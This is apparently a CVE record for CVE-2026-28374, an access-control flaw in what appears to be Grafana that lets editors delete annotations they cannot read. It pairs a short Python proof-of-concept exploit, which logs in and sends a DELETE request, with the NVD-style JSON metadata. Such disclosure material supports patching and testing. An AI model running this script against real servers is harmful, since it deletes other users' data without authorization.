CVE-2026-28374

import requests # Target configuration target_url = "http://localhost:3000" annotation_id = "1" # ID of the annotation to delete username = "editor" password = "password" # Create session and authenticate session = requests.Session() auth_data = {"user": username, "password": password} login = session.post(f"{target_url}/login", data=auth_data) if login.status_code == 200: # Exploit: Send DELETE request to remove annotation # Vulnerability allows Editors to delete annotations they cannot read delete_url = f"{target_url}/api/annotations/{annotation_id}" response = session.delete(delete_url) if response.status_code == 200: print(f"[+] Success: Annotation {annotation_id} deleted.") else: print(f"[-] Failed: Status code {response.status_code}") else: print("[-] Authentication failed")

{"cve": {"id": "CVE-2026-28374", "sourceIdentifier": "[email protected]", "published": "2026-05-13T20:16:19.583", "lastModified": "2026-05-14T16:21:02.930", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Editors could delete any annotation, even those they do not have read access to. The editor user cannot create or read the annotations."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "references": [{"url": "https://grafana.com/security/security-advisories/cve-2026-28374", "source": "[email protected]"}]}}